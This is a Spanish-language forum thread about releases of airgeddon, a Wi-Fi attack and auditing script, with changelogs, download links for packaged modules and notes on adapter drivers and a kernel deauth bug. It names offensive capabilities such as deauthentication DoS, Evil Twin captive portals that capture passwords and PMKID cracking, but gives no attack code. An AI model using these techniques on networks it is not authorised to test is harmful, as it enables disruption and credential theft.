Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 24-11-2022, 20:14 (Jueves)
Hola.

Gracias campeón.

Un módulo para que lo prueben los más vagos,  >:(  >:(  >:(

https://www.mediafire.com/file/zu5bth7lrgs7bl4/airgeddon-11.10-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-03-2023, 00:53 (Martes)
buenas noches... acaba de salir nueva release de airgeddon, la v11.11

Dejo por aquí el changelog:

11.11
Custom enterprise certificates creation fix (now sha256) for modern hostapd-wpe versions
Fixed Docker distro shown (now Kali based)
Fixed PMKID hashcat hash parsing
Improvements on graphics system and resolution detection
Fixed 5Ghz Evil Twin attacks DoS problems
Added 5Ghz country code check
Improvements on OS/distro detection

Saludos terrícolas!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 07-03-2023, 06:39 (Martes)
Hola.

Gracias v1s1t0r.

Como siempre, un módulo para que lo prueben los más vagos,  >:(  >:(  >:(

https://www.mediafire.com/file/jt6us1kgz9qfeqi/airgeddon-11.11-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-04-2023, 12:50 (Miércoles)
Bueno, pues ahí seguimos trabajando en esta aplicación que es interminable... el changelog de la siguiente versión 11.20 viene calentito, y aunque ya tiene cosas, faltan más antes de la release. Por ahora llevamos esto hecho:

11.20
 - Improvements and fixes on "DoS pursuit mode"
 - Fixed bug on Evil Twin captive portal attack when relative paths used
 - Added Consistent Network Device Naming detection check upon interface selection
 - Fixed bug on filtered WPA scans when pure WPA3 (SAE) present

Por cierto, por si algún loco quiere donar al proyecto de una manera diferente, hemos creado esta tiendecilla online: https://airgeddon.creator-spring.com/

Sabemos que hay gente que donar 20 euros por ejemplo sin recibir nada a cambio (aparte de la aplicación que es gratuita) se le hace cuesta arriba. De esta forma puedes invertir en donar por ejemplo (por decir algo) comprando una taza q son 17.77€ y recibes eso, una taza... aunq así al proyecto solo le llegan apenas 5 € ya que hay que descontar el material, la impresión, el embalaje y el envío... es q esta página se ofrece a hacer todo y es muy cómodo. No podríamos poner el merchandising de otra forma. Pero bueno, que es otra forma de donar por si alguien se anima, que necesitamos support.

Saludos!!


P.D. Gracias pepe10000 como siempre por los modulitos
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 06-04-2023, 08:55 (Jueves)
Estupendo, a la espera de la nueva versión para probarla,  >:(  >:(  >:(

De nada campeón.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-06-2023, 12:19 (Viernes)
Acaba de salir la nueva versión 11.20 de airgeddon!! ya está disponible. Para vosotros jugadores  8)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 10-06-2023, 08:13 (Sábado)
Hola.

Gracias campeón por la nueva versión,  >:(  >:(  >:(

Se supone que tengo la mañana tranquila, así que aprovecharé para probarla.

Como siempre, un módulo para los más vagos,  ^-^  ^-^  ^-^

https://www.mediafire.com/file/9lap7zt9b8yxjd5/airgeddon-11.20-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-06-2023, 22:11 (Sábado)
Hola , gracias por el upgrade.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 04-08-2023, 01:15 (Viernes)
Me da gusto que se siga actualizando y dando nuevas funciones para tener siempre ejecutable frente a los cambios que ocurren, muchas gracias que me esta funcionando de pelos esta nueva version  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-09-2023, 10:55 (Miércoles)
Hola gentes del hacking wifi... acaba de salir airgeddon v11.21. Además de traducción al chino (cosa que igual no os interesa especialmente por aquí  ;D ) tiene unas mejoras interesantes en el DoS pursuit mode de los evil twin además de otros fixes... ahí lo dejo.

Saludos terrícolas!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 13-09-2023, 12:09 (Miércoles)
Hola.

Muchas gracias campeón por la nueva versión,  >:(  >:(  >:(

No he tenido tiempo para probarla bien, solo he creado el módulo y comprobado que se ejecuta sin problemas:

https://www.mediafire.com/file/5ruf51cqkt2pwbs/airgeddon-11.21-wifislax.xzm/file

En cuanto tenga un ratito la pruebo,  ;D  ;D  ;D

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 15-09-2023, 20:09 (Viernes)
Gracias por la actualizacion, esta funcionando bastante bien, ya la probé.
Seria bueno que hubiese alguna opción para  redes ocultas. Gracias  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2024, 11:53 (Viernes)
Hola Xiop... la verdad es que hemos incluido una feature referente a esto en la próxima release que está ya muy cercana de salir. Algo que te permite meter a mano el SSID si lo conoces tras seleccionar una red oculta. Todos sabemos que para conocer el ESSID de una red oculta, hay que estar escuchando en el momento justo de que un cliente legítimo conecta... bien, pues como sabemos que no siempre se va a tener esa suerte... pero que a la vez, con que se consiga una vez es suficiente porque ya sabes como se llama, pues ahora airgeddon te permitirá tras seleccionar la red oculta, opcionalmente meter manualmente el ESSID si ya lo conocieras. Con esto queda resuelta tu petición.

Por otra parte, aunque no tiene nada que ver... descargué la wifislax y estuve haciendo algunas pruebas. Parece que el driver de la nueva Alfa AWUS036AXML que es tri-banda (2.4Ghz, 5Ghz y 6Ghz) aún no está soportado en Wifislax. Esta tarjeta promete, la he comprado para ir adelantando alguna prueba sobre los 6Ghz aunque hasta ahora, casi ninguna tool tiene features sobre esta banda, pero bueno, irán apareciendo. Tiene un chipset Mediatek MT7921AUN y es muy probable que en breve sea "el adaptador de moda". De hecho hay dos muy parecidos, el AWUS036AXM y el AWUS036AXML. Uno es solo wifi y el que tengo yo, el AWUS036AXML, tiene también bluetooth. Ambas tienen el mismo chipset de wifi. Bueno, el caso es que aparece cuando hago un "lsusb" pero no aparece en la lista de interfaces e imagino que es simplemente porque el driver no está aún. Sería interesante irlo añadiendo si fuera posible.

Muchas gracias como siempre, y os anunciaré la release de airgeddon espero que pronto. Saludos.

**EDIT** he añadido los drivers de esta página y me han funcionado de maravilla: https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git/tree/mediatek
Copié los tres ficheros WIFI_MT7961_patch_mcu_1_2_hdr.bin, WIFI_RAM_CODE_MT7961_1.bin y BT_RAM_CODE_MT7961_1_2_hdr.bin a /lib/firmware/mediatek y reinicié... y funcionando como la seda. Lo pongo por aquí por si le sirve a alguien hasta que se incluyan oficialmente (si se incluyen). Parece ser que aunque el chipset es 7921, se han mergeado en MT7961. Puedo confirmar que funcionan bien.

**EDIT2** También informo de que hay un bug del kernel que hace que esta tarjeta no funcione bien el deauth mientras está en modo VIF. Es decir, que si haces un DoS con ella normal funciona, pero si estás desdoblándola mientras haces un evil twin, el deauth no funciona. Afecta que sepamos a las versiones de kernel 6.5 y 6.6... y no sabemos cuales más pueden estar afectadas... 6.3?? en la 6.1 funciona bien, que es la que tiene el wifislax 3.3 que usé... en la última 3.4 tiene un kernel más moderno y la tarjeta ya tiene el bug. Ya se ha notificado para ver si lo corrigen. Además que el bug se ha reproducido en diversas distribuciones de linux, es de la versión de kernel en sí.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 05-02-2024, 01:17 (Lunes)
Que buena opción que le vas agregar, sin duda muy importante,a la espera de esta release, gracias v1s1t0r por mantener actualizado. >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-02-2024, 20:09 (Miércoles)
Pues regalito de san Valentín al canto... la versión de airgeddon v11.22 acaba de ver la luz!!!

https://github.com/v1s1t0r1sh3r3/airgeddon

No sé para que pongo el link, es el de siempre  ^-^

Changelog:
 - Possibility to add manually ESSID name for selected hidden networks
 - Improvement on process killing on Evil Twin attacks
 - Add WPS version to network selection menu for WPS networks
 - Reordered networks on network selection menus (standard and WPS), now networks with the strongest received signal will be placed last to avoid scrolling
 - Fixed small bug on Evil Twin captive portal attack for passwords containing more than one space char
 - Fixed Docker routing problem

Si me ayudais a darle difusión en Twitter por ejemplo, se agradece. Nuestro emisario en twitter ha publicado esto: https://twitter.com/OscarAkaElvis/status/1757839392578703368

La verdad es que no sé si poner ese link viola alguna regla del foro... si es así, pido disculpas por anticipado. Me decís y lo edito.

Saludos comunidad!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 15-02-2024, 09:41 (Jueves)
Gracias campeón.

Como siempre, un modulito para los más vagos:

https://www.mediafire.com/file/omh5mmxz8r84za6/airgeddon-11.22-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Hwagm en 15-02-2024, 11:23 (Jueves)
Citar
La verdad es que no sé si poner ese link viola alguna regla del foro... si es así, pido disculpas por anticipado. Me decís y lo edito.

No te preocupes  todo bien

También te lo puedes poner en tu firma y perfil :)

 ;D